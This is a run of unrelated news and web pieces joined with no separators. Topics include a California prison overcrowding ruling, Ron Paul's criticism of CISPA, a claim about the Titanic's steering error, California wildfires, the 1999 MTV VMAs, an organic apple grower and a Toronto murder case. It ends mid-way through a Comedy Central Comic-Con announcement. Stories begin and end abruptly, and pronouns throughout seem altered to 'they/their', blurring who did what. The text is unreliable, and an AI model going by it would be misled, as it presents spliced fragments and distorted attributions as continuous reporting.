The court supported its argument by citing Gov. Arnold Schwarzenegger's own support for prison reforms, which they have said would reduce the population by about 40,000 inmates.
“We cannot believe that such support would exist if the adoption of such measures would adversely affect public safety,” the court ruled.
The panel, which is composed of a federal appeals judge for the Ninth Circuit and two federal district judges, estimated the state could save $803 million to $906 million annually if it were to reduce its prison population. It also said it could use that money to shore up local agencies that would serve parolees or probationers diverted from prison.
The ruling left the door open for still more negotiations between the thousands of imprisoned plaintiffs and the state in the court proceedings, part of a series of class-action lawsuits accusing the state of failing to provide adequate health care to prisoners.
Newsletter Sign Up Continue reading the main story Please verify you're not a robot by clicking the box. Invalid email address. Please re-enter. You must select a newsletter to subscribe to. Sign Up You will receive emails containing news content , updates and promotions from The New York Times. You may opt out at any time. You agree to receive occasional updates and special offers for The New York Times's products and services. Thank you for subscribing. An error has occurred. Please try again later. View all New York Times newsletters.
Federal judges have already ruled that the state's failure to provide medical and mental health care is killing at least one inmate every month and has subjected inmates to cruel and unusual punishment, which is prohibited by the Constitution.
In their ruling on Monday, the judges ruled that reducing overcrowding was the only way to reform the prison health care system and encouraged plaintiffs' and state lawyers to negotiate a way to cut the prison population. The judges also indicated that they would mandate a prison population cap of about 120 percent to 145 percent of the state's designed capacity.
The judges have been reluctant to order specific reforms, however, and several times during final arguments they asked lawyers for the state what their plans were to reduce the prison population and whether the court had the authority to impose specific remedies.
The plaintiffs' lawyer, Don Specter, said the judges, all of whom are known for their liberal rulings, may be reluctant to give specific reforms to the state, preferring the state arrive at its own reduction plan, because the judges' decision might otherwise be overturned by the United States Supreme Court, which would hear any appeal.
Advertisement Continue reading the main story
One judge on the panel, Thelton E. Henderson, already appointed a federal receiver to take over the prison health care system. The receivership, which has demanded billions of dollars for new medical facilities, has repeatedly clashed with the strapped state, which recently demanded the dissolution of the court-appointed office.
The California prison system has doubled its design capacity, and some facilities are even more packed than that. Prison gymnasiums and classrooms are packed with three-tier prisoners' bunks, and lines for prison health clinics often snake 50 men deep. Rehabilitation programs, recreational facilities and health care facilities are all compromised by the crowds of felons.
Lawyers for the prisoners said that despite California's exceptionally poor conditions, the ruling could have a national impact on prison reform if other inmate lawsuits seek population caps on other overcrowded facilities.
The ruling is also an important success for inmates since the passage of the Prison Litigation Reform Act of 1995, which made it harder for prisoners to bring lawsuits and limited court remedies for allegations of prison abuse.
Cyber Intelligence Sharing and Protection Act is expected to pass the House despite objections from civil liberties groups
Republican presidential candidate Ron Paul has slammed a controversial cyberterrorism bill, calling it "Big Brother writ large" and saying it would make "government spies" of Facebook and Google.
The Cyber Intelligence Sharing and Protection Act (Cispa) is due to be heard in the House of Representatives this week and now has the backing of 112 members of Congress.
The bill aims to make it easier for US companies and authorities to share information as they tackle online crime. But it has been attacked by civil liberties groups as too broadly written and a threat to the privacy of ordinary citizens.
Paul urged their supporters to protest against the bill, pointing to the successful campaign against the Stop Online Piracy Act (Sopa) earlier this year.
"We should never underestimate the federal government's insatiable desire to control the internet," said Paul in an address released Monday.
"Cispa permits both the federal government and private companies to view your private online communications without judicial oversight provided that they do so of course in the name of cyber-security," they said.
The bill was too broadly written and allows the government to use people's information "far beyond any reasonable definition of fighting cyberterrorism," they said.
Paul said Cispa was an "alarming form of corporatism" that "further intertwines government with companies like Google and Facebook. It permits them to hand over your private communication to government officials without a warrant. Circumventing the well-known established federal laws like the wiretap act and the electronic communications privacy act."
"Simply put, Cispa encourages some of our most successful internet companies to act as government spies, sowing distrust of social media and chilling communications in one segment of the world economy where Americans still lead," said Paul.
"Imagine having government-approved employees embedded at Facebook, complete with federal security clearances serving as conduits for secret information about their American customers," they said.
Paul joins a chorus of critics including the White House as well the American Civil Liberties Union (ACLU), Electronic Frontier Foundation and other civil rights groups that have been campaigning against the bill.
The bill's primary sponsor, Mike Rogers, told Talking Points Memo that there was a "strong chance" the bill would be passed by the House this week.
But now it has been revealed they spotted it well in advance but still steamed straight into it because of a basic steering blunder.
According to a new book, the ship had plenty of time to miss the iceberg but the helmsman panicked and turned the wrong way.
By the time the catastrophic error was corrected it was too late and the side of the ship was fatally holed by the iceberg.
Even then the passengers and crew could have been saved if it had stayed put instead of steaming off again and causing water to pour into the broken hull.
The revelation, which comes out almost 100 years after the disaster, was kept secret until now by the family of the most senior officer to survive the disaster.
Second Officer Charles Lightoller covered up the error in two inquiries on both sides of the Atlantic because they were worried it would bankrupt the liner's owners and put their colleagues out of job.
Since their death – by then a war hero from the Dunkirk evacuation – it has remained hidden for fear it would ruin their reputation.
But now their granddaughter the writer Lady (Louise) Patten has revealed it in their new novel.
"It just makes it seem all the more tragic," they said.
"They could easily have avoided the iceberg if it wasn't for the blunder."
The error on the ship's maiden voyage between Southampton and New York in 1912 happened because at the time seagoing was undergoing enormous upheaval because of the conversion from sail to steam ships.
The change meant there was two different steering systems and different commands attached to them.
Some of the crew on the Titanic were used to the archaic Tiller Orders associated with sailing ships and some to the more modern Rudder Orders.
Crucially, the two steering systems were the complete opposite of one another.
So a command to turn "hard a starboard" meant turn the wheel right under the Tiller system and left under the Rudder.
When First Officer William Murdoch spotted the iceberg two miles away, their "hard a-starboard" order was misinterpreted by the Quartermaster Robert Hitchins.
They turned the ship right instead of left and, even though they were almost immediately told to correct it, it was too late and the side of the starboard bow was ripped out by the iceberg.
"The steersman panicked and the real reason why Titanic hit the iceberg, which has never come to light before, is because they turned the wheel the wrong way," said Lady Patten who is the wife of former Tory Education minister, Lord (John) Patten.
Whilst their grandfather Lightoller was not on watch at the time of the collision, their book Good as Gold reveals that a dramatic final meeting of the four senior officers took place in the First Officer's cabin shortly before Titanic went down.
There, Lightoller heard not only about the fatal mistake, but also what happened next, up on the bridge.
While Hitchins had made a straightforward error, what followed was a deliberate decision.
Bruce Ismay, chairperson of Titanic's owner, the White Star Line, persuaded the Captain to continue sailing.
For ten minutes, Titanic went "Slow Ahead" through the sea.
This added enormously to the pressure of water flooding through the damaged hull, forcing it up and over the watertight bulkheads, sinking Titanic many hours earlier than they otherwise would have done.
"Ismay insisted on keeping going, no doubt fearful of losing their investment and damaging their company's reputation,” said Lady Patten.
"The nearest ship was four hours away. Had they remained at ‘Stop', it's probable that Titanic would have floated until help arrived."
The truth of what happened on that historic night was deliberately buried.
Lightoller, the only survivor who knew precisely what had happened, and who would later go on to be a twice-decorated war hero, decided to hide what they knew from the world, including two official inquiry into the sinking.
By their code of honour, they felt it was their duty to protect their employer – White Star Line – and its employees.
Lady Patten said: "The inquiry had to be a whitewash. The only person they told the full story to was their beloved wife Sylvia, my grandmother.
"As a teenager, I was enthralled by the Titanic. Granny revealed to me exactly what had happened on that night and we would discuss it endlessly."
"She died when I was sixteen and, though they never told me to keep the knowledge to myself, I didn't tell anyone.
"My mother insisted that everything remained strictly inside the family: a hero's reputation was at stake.
"Nearly forty years later, with Granny and my mother long dead, I was plotting my second novel and it struck me that I was the last person alive to know what really happened on the night Titanic sank.
"My grandfather's extraordinary experiences felt like perfect material for Good As Gold. ”
The new Speaker of Missouri House will deliver the Republican response to Governor Jay Nixon's (D) State of the State address, a week from today.
John Diehl, Junior (R-Town and Country) presides over a Republican supermajority in the House. They say that, and the supermajority in the state Senate, “are a representation of the dissatisfaction that Missourians have with the failed policies of Governor Nixon and President Obama.”
In a statement, Diehl adds, “It's clear that the people of our state are looking for leadership in Jefferson City that will work to reduce the size of government, create better schools, and promote an environment where businesses grow and jobs are created. In their address I am hopeful that Governor Nixon will recognize the kind of leadership that Missourians are demanding and join the Republican majorities in supporting policies that will promote prosperity and opportunity for our state.”
Governor Nixon's State of the State Address will be delivered at 7 p.m. Wednesday, January 21. In their annual address, Nixon outlines their legislative and spending priorities, and the same day presents their proposed budget for the fiscal year that begins July 1.
Missourinet will have complete coverage of the State of the State address and the Republican response.
I count myself as a supporter of President Obama who reserves the right to criticize them when I disagree. And I disagreed with their reluctance to come out in support of gay marriage for a long time. I'm also on record wishing he'd taken a stronger public stance behind several big progressive priorities -- a larger stimulus, tougher Wall Street reform, a public option for health insurance, a big jobs bill – whether or not they had the congressional support to make it happen.
Throughout the president's first term, their most ardent supporters have reacted to those of us pushing them to do – and say – more on such issues with frustration and anger, some of it nasty and personal, some of it thoughtful and well-argued. They rightly blame Congress for blocking action on key progressive priorities, but strangely downplay the power of presidential leadership. Late last year, New York magazine's Jonathan Chait twice attacked liberal Obama critics for being "unreasonable" about what the president alone could accomplish, because "liberals, on the whole, are incapable of feeling satisfied with a Democratic president."
Advertisement:
Chait took particular aim at lefty image guru Drew Westen, a one-time Obama admirer who criticized the president in the New York Times not merely for what they hadn't accomplished, but for failing to tell a compelling story. Chait accused Westen and other progressives of embracing:
…a model of American politics in which the president in not only the most important figure, but their most powerful weapon is rhetoric. The argument appears calculated to infuriate anybody with a passing familiarity with the basics of political science. In Westen's telling, every known impediment to legislative progress — special interest lobbying, the filibuster, macroeconomic conditions, not to mention certain settled beliefs of public opinion — are but tiny stick huts trembling in the face of the atomic bomb of the presidential speech. The impediment to an era of total an uncompromising liberal success is Obama's failure to properly deploy this awesome weapon.
Chait caricatured Westen's argument (and the beliefs of those who agreed with it), but they got lots of love for both pieces in the pro-Obama blogosphere, where folks finally felt they had a real diagnosis for the illness of those they dismissed as "emoprogs." But now that we see the changes wrought by Obama's politically risky embrace of gay marriage, maybe it will be easier for folks to understand that it's the job of political advocates not merely to praise, but to push their leaders forward.
Steve Kornacki runs down the astonishing political changes we've seen in the mere two weeks since the president carefully announced their supposed change of heart on gay marriage. The nation's largest African-American organization, the NAACP, has come out behind it – and maybe most important, recognized it as an important civil rights issue. Maybe most dramatic, in Maryland, African-American voters have now flipped to support the state's gay marriage ballot measure 55 to 36 percent –almost the exact percentage by which they opposed it in previous polling on the state issue. And in the latest ABC News/Washington Post poll, African-Americans' support for gay marriage jumped to 59 percent from 41 percent in the wake of the president's historic announcement.
Now, I'm not going to argue that Obama's turnaround alone caused this sea change. The arc of the moral universe has been bending toward justice on gay rights for a long time, and as I wrote last week, the president gave it an additional tug. There have been advocates within the NAACP working to make this happen for a long time, and they deserve a lot of credit. African-American voter opinion had already been trending in this direction, even if black voters had been less receptive to gay marriage than other demographic groups. There is also an emotional and personal component to the president's stance that makes their moral suasion hard to replicate on behalf of, say, the jobs bill or the public option. (And let's also remember it's white voters who are most hostile on some of those economic issues, thanks to the divide and conquer politics of the GOP over the last 40 years.)
Still, it's hard not to conclude that Obama's words made a significant difference in the political course of this debate. Ironically, it was once critics of Obama who mocked the power of words, and specifically the candidate's own oratorical gifts. Obama shot back at them many times.
"Don't tell me words don't matter," they told Wisconsin Democrats in February 2008. "'I have a dream' — just words. ‘We hold these truths to be self-evident, that all men are created equal' — just words. ‘We have nothing to fear but fear itself' – just words. Just speeches." At many times over the last three years, I've been amazed at how Obama's critics and supporters seemed to change sides on the question of the power of their words.
Advertisement:
I give the folks who call themselves "prag progs" – pragmatic progressives, as opposed to "unreasonable" emoprogs – a lot of credit for fixing attention on what the president has accomplished, and reminding others not merely to fixate on what they haven't. But I think it's time that all of us acknowledge that there's a role for constructive pressure, too. Progressive change has always required impatient agitators – and it will continue to.
Media playback is unsupported on your device Media caption Firefighters rescue dozens of children from wildfire
Wildfires in California are still uncontained, forcing thousands of people to be evacuated, officials say.
A combination of high temperatures and parched land has added to the difficulties of firefighters.
About 14 fires fanned by strong winds have raged across the length and breadth of the US state, all in different stages of containment.
The fires are especially bad in Santa Barbara County where one is spanning an area of more than 45 sq mi (116 sq km).
Slightly cooler temperatures on Monday are giving officials hope that they will make progress on containing the fires.
Image copyright AFP Image caption Firefighters are dealing with blazes across the length and breadth of California, which is regularly hit by such outbreaks at this time of the year
Nearly 4,000 people were ordered to urgently evacuate from the area north of Sacramento on Sunday night, but fire crews say that if winds stay low, they may be able to return later on Monday.
Another 3,500 people remain under evacuation orders in the southern part of the state, in Santa Barbara county.
Five thousand firefighters have been deployed across California, state officials say. Several injuries have been reported and numerous buildings and homes destroyed.
Media playback is unsupported on your device Media caption California wildfires
Air quality is reported to be noticeably poorer in areas inland from Los Angeles due to smoke in the air.
California and western North America are regularly hit by wildfires at this time of the year.
Smaller forest fires are also burning in Arizona, Colorado and New Mexico.
More than 200 fires have been reported in Canada's British Columbia province.
Media playback is unsupported on your device Media caption Wildfires in California are quickly spreading the length and breadth of the US state
Image copyright AFP Image caption The flames have been fanned by low humidity, high temperatures and a strong breeze
Image copyright AFP Image caption Some residents have taken the precaution of covering their vehicles with fire retardants
Image copyright AFP Image caption California is now being hit by "dangerous and potentially life-threatening heat", authorities say
Originally in my mind they all slept in bunk beds, which is still definitely possible, but the layout now kinda looks like they sleep in the same bed in the style of Charlie Bucket's grandparents. Whatever, it's funny to me either way.
And with that we're gonna put a bow on it! A goofy story that started waaaaaaaaay back here and blew up to spawn a bunch more ideas than I originally planned (some good, like this one), as well as a couple of shifts in art, which I don't mind, as long as it's moving in the right direction (which I hope it is). Anyway, the team's gonna take a quick break, and we're gonna focus on some more done in one type jokes. You'll love it. Probably. At least I will. I think. Whatever!
The 1999 MTV Video Music Awards aired live on September 9, 1999, honoring the best music videos from June 13, 1998, to June 11, 1999. The show was hosted by Chris Rock at Metropolitan Opera House in New York City.[1] Lauryn Hill was the big winner of the night, taking home four Moonmen, including Best Female Video and the big one, Video of the Year
Highlights of the show included Diana Ross jiggling Lil' Kim's exposed breast in response to their outfit, which left their entire left breast uncovered, but for a small pastie on their nipple. The mothers of slain rappers Tupac Shakur and The Notorious B.I.G., Afeni Shakur and Voletta Wallace, came together to present the Best Rap Video Award. The Beastie Boys' Adam Horovitz made a plea for peace in the wake of the sexual assaults at Woodstock '99. Near the end of the night, MTV staged a tribute to Madonna, the most-nominated artist in VMA history, by presenting a host of male drag performers dressed as the singer in their past music videos. Rapper DMX was scheduled to perform but was a no-show; as a result, Jay-Z's solo set was extended. Another moment of the ceremony was the debut of Britney Spears performing their debut single ...Baby One More Time, and then, NSYNC, performed their song Tearin' Up My Heart.
As Backstreet Boys came up and accepted their award for Viewer's Choice, a stranger came onto the stage and said, "Wake up at 3". This person was later revealed to be John Del Signore, who crashed the ceremony in a failed attempt to sell Viacom a show idea.[2]
Nominations [ edit ]
Winners are in bold text.
Video of the Year [ edit ]
Lauryn Hill – "Doo Wop (That Thing)"
Best Male Video [ edit ]
Will Smith – "Miami"
Best Female Video [ edit ]
Lauryn Hill – "Doo Wop (That Thing)"
Best Group Video [ edit ]
TLC – "No Scrubs"
Best New Artist in a Video [ edit ]
Eminem – "My Name Is"
Best Pop Video [ edit ]
Ricky Martin – "Livin' la Vida Loca"
Best Rock Video [ edit ]
Korn – "Freak on a Leash"
Best R&B Video [ edit ]
Lauryn Hill – "Doo Wop (That Thing)"
Best Rap Video [ edit ]
Jay-Z (featuring Ja Rule and Amil) – "Can I Get A..."
Best Hip-Hop Video [ edit ]
Beastie Boys – "Intergalactic"
Best Dance Video [ edit ]
Ricky Martin – "Livin' la Vida Loca"
Best Video from a Film [ edit ]
Madonna – "Beautiful Stranger" (from Austin Powers: The Spy Who Shagged Me)
Breakthrough Video [ edit ]
Fatboy Slim – "Praise You"
Best Direction in a Video [ edit ]
Fatboy Slim – "Praise You" (Director: Torrance Community Dance Group)
Best Choreography in a Video [ edit ]
Fatboy Slim – "Praise You" (Choreographers: Richard Koufey and Michael Rooney)
Best Special Effects in a Video [ edit ]
Garbage – "Special" (Special Effects: Sean Broughton, Stuart D. Gordon and Paul Simpson of Digital Domain)
Best Art Direction in a Video [ edit ]
Lauryn Hill – "Doo Wop (That Thing)" (Art Director: Gideon Ponte)
Best Editing in a Video [ edit ]
Korn – "Freak on a Leash" (Editors: Haines Hall and Michael Sachs)
Best Cinematography in a Video [ edit ]
Marilyn Manson – "The Dope Show" (Director of Photography: Martin Coppen)
Best Artist Website [ edit ]
Red Hot Chili Peppers (www.redhotchilipeppers.com)
Viewer's Choice [ edit ]
Backstreet Boys – "I Want It That Way"
International Viewer's Choice Awards [ edit ]
Silverchair – "Anthem for the Year 2000"
Raimundos – "Mulher de Fases"
A. R. Rahman – "Dil Se Re"
H.O.T. – "Make a Line"
Ricky Martin – "Livin' la Vida Loca"
Ricky Martin – "Livin' la Vida Loca"
Shino Lin – "Irritated"
Ricky Martin – "Livin' la Vida Loca"
Parokya ni Edgar – "Harana"
Performances [ edit ]
Main show [ edit ]
Appearances [ edit ]
See also [ edit ]
“I was learning to reduce all that, but I didn't really shift the paradigm,” they said.
But the more they thought about how homegrown food and medicinal herbs bolstered their own health (his wife, Nancy, is an herbalist), the more they became convinced of the importance of feeding their trees with fungal-rich mulch and herbal sprays that boosted their immune systems.
In their latest book, they reject even copper and sulfur sprays.
“The Holistic Orchard: Tree Fruits and Berries the Biological Way,” which will be published next month by Chelsea Green, explains how to grow fruit with nothing more lethal than neem oil and sprays made out of liquid fish fertilizer (which has fatty acids and enzymes lacking in pasteurized fish emulsion), homegrown horsetail and stinging nettles (both are high in silica and help leaves fend off fungal disease).
Photo
More important, they write, apple growers need to understand how their trees grow above and below ground and what kind of soil they need: the woodsy, fungal-dominated kind found at a forest's edge, rather than nitrogen-rich garden soil.
They also talk about how to prune and how to mulch with ramial wood chips, the tender branches pruned in late winter that can be allowed to decompose wherever they fall.
And they suggest herbs to grow beneath the trees, like comfrey, which is rich in calcium and draws minerals from subsoil. Also, its flowers attract native bees, to pollinate the apple blossoms.
To encourage those bees to stay, Mr. Phillips makes nests out of pieces of septic pipe. Native mason bees and bumblebees, they said, are more efficient at pollinating than European bees, which are also scarce these days. “Honeybees are like bankers,” they said. “They work 9 to 5, and only when it's 60 degrees. Bumblebees and mason bees work from first light until dark, and pollinate all the female parts of a flower, so all the seeds take.”
If it sounds complex, it is. But don't worry, Mr. Phillips says, smiling angelically. If you plant a tree, you will get apples in seven years or so. (Impatient gardeners need not apply.)
Advertisement Continue reading the main story
“But that's good,” they said. “As the tree is growing, you're learning.” A beginner, they suggest, could plant three trees in a triangle, 20 feet apart. Dwarf trees need less space, but have weaker root systems and are more subject to disease.
So if you have a tiny backyard, consider collaborating with your neighbors. Or support a community orchard, they said, which is usually run by “the guy who gets so excited, they say, ‘Honey, I'm going to plant 10 more trees.' ”
Photo
MR. PHILLIPS'S love affair with apples began soon after they started their first job as a civil engineer, managing construction outside Washington, D.C.
“I would watch the sun rise over four-lane bumper-to-bumper traffic, thinking, ‘There's probably something out there that would make me happier,' ” they said. “I retired from civil engineering at 23.”
Soon, they had signed on as a carpenter for a community in southern New Hampshire devoted to helping abused and abandoned children. There, they helped build post-and-beam solar houses and dug up old tennis courts (the property had once been a summer camp), turning them into gardens.
They also planted apple trees. “And I realized, ‘I love this,' ” they said.
In the fall, they took time off to pick apples in southern Vermont. Then one spring, they headed to New Zealand, where it was fall, to pick apples.
“I picked Cox's Orange Pippins, looking out over the Tasman Sea,” they said. “They taste pretty good right off the tree.”
By the time they returned, they were determined to grow apples organically. They had fallen in love with a social worker, Nancy Spannenberg, at the children's community, and the two moved north in the late 1980s, eventually settling here and raising a daughter, Grace, now 16, along with herbs, vegetables and, of course, apples.
Advertisement Continue reading the main story
Their farmstead, which harks back to the 1880s, had a remnant of an earlier orchard: a century-old tree that bears Duchess of Oldenburg apples, a chain embedded in its trunk to keep it from breaking apart.
Photo
“It's one of four apple varieties brought to American shores in the 1830s from Russia,” Mr. Phillips said. “They were looking for apples that were very hardy to this climate, that a homestead family could depend on for a crop.”
It's also one of their favorite apples, a tart summer variety that makes a great pie and applesauce.
“It has a reddish blush on green, with some stripes, and then the green turns yellow,” they said, with a lover's attention to detail.
But then, Mr. Phillips loves all their apples. And there are 80 varieties thriving here.
One wild apple tree was 20 years old when they got here, and they could tell it had a healthy root system. So they started grafting varieties to its branches. Now, 24 varieties ripen on its stems.
How is that possible?
When children ask that, Mr. Phillips answers like this: “I say, ‘Kayle, if I cut off your thumb and put it on Ben's thumb over here, then everything growing out of Ben's thumb would be Kayle.' ”
Gruesome, but clear.
So is their description of their nemesis, the round-headed apple-tree borer.
“The female crawls down the trunk to the soil line and makes as many as seven slits in a little baby tree the size of my thumb and lays an egg,” they said. “That grub stays in there for two years, eating the cambium and sap wood, then extends down to the roots. If just one survives, that tree's dead.”
You could go after the larvae with a wire, but if there are seven, you'll carve up the tree.
Instead, in July and August, when the females lay their eggs, Mr. Phillips sprays the trunk with a neem oil solution that contains a compound called azadirachtin, which suppresses molting. If an insect can't shed its skin as it grows, it dies. Neem oil also deters insects from feeding and laying eggs.
Chemical companies have isolated the compound to manufacture patented products like Neemix or Ecozin. But those extractions “lose the other constituents of the plant,” Mr. Phillips said.
Photo
For instance, pure neem oil, they said, has terpenoid compounds that help the neem tree combat disease. Apple trees have the same terpenoids, so they respond to the oil.
Advertisement Continue reading the main story
Mr. Phillips sprays their trees at various stages: when the buds are “quarter-inch green,” as orchardists say, then when they are pink and then when the petals fall. These are the times when pests like moths and curculios feed on the tender flowers, and when fungal diseases like scab and cedar apple rust settle onto leaves and stems. “By spraying, I'm stimulating the terpenoids in the apple tree,” they said. “And boosting its immune system.”
Though two inches of wet snow lay on the ground on that sunny afternoon, it was quickly melting, and a few trees were still laden with fruit. Mr. Phillips had been up on their ladder picking the last of Northern Spy, a tangy red apple that makes a great pie and stores well. It's one of those late-season apples that used to get nipped by the cold 20 years ago, when October meant temperatures in the 20s.
“But now I can tree-ripen the fruit,” they said.
That's the good side of climate change. The bad side is 80 degrees on April Fool's Day, which brings out the apple blossoms, followed by a hard freeze. That happened last year.
This year it was hail the size of golf balls that knocked half the leaves off the trees, when the late varieties were in full bloom.
“I was afraid I would see all kinds of fire blight,” Mr. Phillips said, “because of all the wounds opening into the vascular system.”
But the bark healed. All those sprays full of microbes and fatty acids must have built up the trees' immune systems.
Photo
That's what Mr. Phillips means by holistic: healing from within.
Before Picking Fruit, Pick a Tree
Advertisement Continue reading the main story
“It doesn't hurt to be reflective about which varieties to grow,” said Michael Phillips, who grows about 80 kinds of apples in northern New Hampshire.
But most of us, they know, are more likely to think, “I'm going to plant an apple tree this weekend,” and run out to the Home Depot or Lowe's, where there are four or five ubiquitous varieties, some of which won't grow well in your area.
“Here, it's Agway, which sells Macintosh, Cortland, Red Delicious and Granny Smith,” Mr. Philips said.
Granny Smith ripens in mid-November to early December. “And no way that'll happen here,” they said. “Yet they sell it in northern New Hampshire.”
Better to talk to local orchardists and hobby growers first, to find out which varieties are suited to your soil and climate. Mr. Phillips's book “The Holistic Orchard” lists a number of growers' associations, including North American Fruit Explorers (nafex.org); Holistic Orchard Network (groworganicapples.com), which contains information on community orchards, and Backyard Fruit Growers (sas.upenn.edu/~dailey/byfg.html).
One of the worst things for an apple tree is to be plopped into a little hole dug in a lawn (which is often over-fertilized with nitrogen) and sprayed with herbicides. Dense grass roots also compete for nutrients in the soil.
“If you plunked one in, you should have removed a four-foot area around the tree,” Mr. Phillips said. If you didn't remove the sod, “cover it with cardboard and straw, or wood chips to smother the grass and break things down.”
Ideally, the ground should be prepared a year ahead, planted with a cover crop like red or crimson clover and also mixed with oats.
Fall is also a good time to collect soil samples and send them to a reputable soil testing lab, like the one run by the University of Massachusetts (extension.umass.edu/floriculture/services/soil-testing).
Advertisement Continue reading the main story
Then spend the winter reading “The Holistic Orchard.”
A man accused of killing Ryerson University cancer researcher Mark Ernsting may see their charges upgraded from second- to first-degree murder. Homicide Det. Paul Worden of the Toronto Police told Metro News that Calvin Michael Nimoh, 21, will be facing the new charges on Jan. 7, the date of their next court appearance.
Calvin Michael Nimoh, 21, has been charged in connection with an armed robbery and a fatal stabbing in Toronto on Dec. 16. Toronto Police say their charges will be upgraded to first-degree murder. ( Toronto Police )
Ernsting, 39, was walking on McGill St. on Dec. 16 when they were stabbed multiple times by a single assailant around 9:30 p.m. The assailant fled the scene, but was arrested within an hour. Ernsting was rushed to hospital, where they later died. Worden believes the assailant was trying to rob Ernsting before they died. “Through our investigation and evidence gathered, we believe the stabbing occurred first, which fits the definition of first-degree murder when you commit a robbery,” Worden said. This is the second robbery they are alleged to have committed that night. Around 7:45 p.m. on Dec. 16, Toronto Police say that a man and two females stabbed and robbed a 65-year-old woman of their purse near Yonge St. and Summerhill Ave. The woman was stabbed four times but survived, and has since been released from hospital.
Article Continued Below
Nimoh has been charged with robbery, assault with a weapon, and weapons dangerous in relation to that attack. Tira Thompson, 24, said to be Nimoh's girlfriend, and a then 17-year-old underage suspect have been charged in the incident with aggravated assault, robbery and possession of stolen property under $5,000. The underage suspect cannot be identified, under the Youth Criminal Justice Act. Thompson has also been charged as an accessory after the fact to murder, and obstructing a peace officer, in relation to Ernsting's murder. Thompson appeared in court Dec. 24. The other woman, now 18, will be appearing in court on Dec. 31. Worden told Metro News the motive for both attacks is unclear.
“The motivation was they were robbing people for money, and it turned violent, and we're not sure why,” Worden said.
Article Continued Below
With files from Jacques Gallant and Metro News
COMEDY CENTRAL® IS COMING TO SAN DIEGO COMIC-CON!
Courtesy of “Another Period,” Comedy Central's New Turn-Of-The-Century Franchise, Fans Can Get Free Rides in Old Tyme Cars Thursday, July 9 - Sunday, July 12 from 11:00 a.m.-5:00 p.m. and Be Carried Away by Butlers in Plush Chaise Lounge Chairs thanks to “Another Period's” Original Lift From Thursday, July 9 - Saturday, July 11 from 11:00 a.m.-6:00 p.m.
#ComedyCentralCon Free and Open to the Public Fan Event Featuring 9-Hole Mini-Golf, “Drunk History” 360 Photo Booth Experience, GIF Booth, Talent Signings, Giveaways and More! Friday, July 9 and Saturday, July 10 from 11:00 a.m.-8:00 p.m. at The San Diego Wine & Culinary Center
NEW YORK, June 29, 2015 – Comedy Central is heading to Comic-Con with a plethora of events. It kicks off with panels in the Indigo Ballroom at the Hilton Bayfront on Thursday, July 9 starting with the upcoming animated series “Moonbeam City” (moderator Scott Aukerman, star and Producer Rob Lowe, series creator and Executive Producer Scott Gairdner, Executive Producer Tommy Blacha, Executive Producer Richie Schwartz) from 4:00-5:00 p.m. The evening continues with back-to-back panels from 6:00-7:30 p.m. featuring “Drunk History” (moderator Paul F. Tompkins; co-creator, host, Director Derek Waters; co-creator, Director Jeremy Konner; series recurring guest stars Taran Killam and Paget Brewster) followed by new series “Another Period” (stars and Executive Producers Natasha Leggero and Riki Lindhome, series co-stars Armen Weitzman, Michael Ian Black, Paget Brewster; and Executive Producer, Director Jeremy Konner).
Comedy Central's no-badge-required, free and open to the public event, #ComedyCentralCon will take place from 11:00 a.m.-8:00 p.m. on Friday, July 10 and Saturday, July 11 at The San Diego Wine & Culinary Center (200 Harbor Dr. #120) directly across from the Convention Center. #ComedyCentralCon will feature the following: a 9-Hole Mini Golf course featuring a variety of the brand's series including “Broad City,” “Review,” “Key & Peele,” “@Midnight with Chris Hardwick,” “Workaholics,” “Inside Amy Schumer” – and a first look at some new and never-before-seen franchises such as “Another Period,” “Why? With Hannibal Buress” and “Moonbeam City.”
Also, fans at #ComedyCentralCon can snap a virtual pic in the Comedy Central GIF photo booth with the stars of “Workaholics,” “Key & Peele,” “Broad City,” “Why? With Hannibal Buress,” “Another Period,” and “Moonbeam City;” get dizzy with “Drunk History” in a 360 photo booth experience; and spin a prize wheel to win limited edition Comedy Central collectibles. And to top it all off, some of the stars will be stopping by #ComedyCentralCon to meet fans and sign autographs.
For Comedy Central's new turn-of-the-century franchise “Another Period” Comedy Central is kicking it old school and giving Comic-Con go-ers free rides in Old Tyme vehicles from Thursday, July 9 – Sunday, July 12 from 11:00 a.m.-5:00p.m. . Fans can flag down the vintage cars and enjoy a free ride to their destination while living like the original ballers did and bumping to some hip-hop jams along the way. Wait. Can't catch a car? No worries! Comic-Con fans will also have the opportunity to get carried away with “Another Period's” Original Lift from Thursday, July 9 – Saturday, July 11 from 11:00 a.m. – 6:00 p.m. Butlers will be carrying participants for free around downtown San Diego and pampering them in swanky chaise lounge chairs. Walking is so overrated anyway.
On Friday, July 10, “The Meltdown with Jonah and Kumail,” hosted as always by Jonah Ray and Kumail Nanjiani, will be taking their uber popular Los Angeles stand-up show to Comic-Con with a free performance at The American Comedy Co. on 818 6th Ave at 7:30 p.m. “The Meltdown” is in its second season on Comedy Central with new episodes airing on Tuesdays at 12:30 a.m. ET/PT. Based on the live show which takes place in the back of Meltdown Comics in LA, Ray and Nanjiani welcome the biggest names in comedy as they experiment with new bits onstage and hang out backstage.
Thursday, July 9: “Moonbeam City” panel (Indigo Ballroom at the Hilton Bayfront Hotel)
4:00-5:00 p.m. “Moonbeam City” is an absurdist, retro-futuristic 80s cop extravaganza. Comedy Central's new animated series follows Dazzle Novak (voiced by Rob Lowe), a handsome, idiotic detective who commits more crimes than most criminals. Their sexy, tyrannical chief Pizzaz Miller (Elizabeth Banks) won't get off their back. Their obnoxious rival Rad Cunningham (Will Forte) will stop at nothing to destroy him. Dazzle must team up with the city's only competent police officer, Chrysalis Tate (Kate Mara), to protect their beloved, neon-soaked metropolis. “Moonbeam City” premieres on Wednesday, September 16 at 10:30 p.m. ET/PT following the 19th season premiere of “South Park.” The panel will be moderated by Scott Aukerman and include series star and Producer Rob Lowe, series creator and Executive Producer Scott Gairdner, Executive Producer Tommy Blacha and Executive Producer Richie Schwartz.
Thursday, July 9: Comedy Central Presents “Drunk History” and “Another Period” panel
(Indigo Ballroom at the Hilton Bayfront Hotel)
